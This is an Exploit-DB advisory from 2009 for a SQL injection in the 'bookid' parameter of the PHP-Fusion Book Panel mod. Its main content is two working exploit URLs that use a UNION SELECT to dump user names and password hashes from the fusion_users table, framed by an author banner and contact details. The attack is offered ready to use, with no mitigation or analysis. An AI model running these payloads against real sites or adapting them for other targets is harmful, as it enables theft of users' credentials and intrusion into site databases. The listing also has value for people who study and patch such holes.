PHP-Fusion Mod Book Panel - 'bookid' SQL Injection

EDB-ID:

8186

Author:

elusiven

Type:

webapps

Platform:

PHP

Published:

2009-03-09

/+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\
+                                                                                                                       +
+  |----------------------------------------------------------------|                                                   +
+  | PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability |                                                   +
+  |----------------------------------------------------------------|                                                   +
+                                                                                                                       +
+   [-] ...Cos co robie z czystej pasji, cos co lubie i czym sie fascynuje :-)                                          +
+                                                                                                                       +
+  |--------------------------------|                                                                                   +
+  | Author: elusiven from Poland ! |                                                                                   +
+  | Contact: elusivenpl@gmail.com  |                                                                                   +
+  | Greetings: Fusi0n Group        |                                                                                   +
+  |--------------------------------|                                                                                   +
+                                                                                                                       +
+   Exploit:                                                                                                            +
+                                                                                                                       +
+   http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_name,4,5,6+from+fusion_users--         +
+   http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_password,4,5,6+from+fusion_users--     +
+                                                                                                                       +
\+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++/

/join #wyjadacze on irc.quakenet.org

# milw0rm.com [2009-03-09]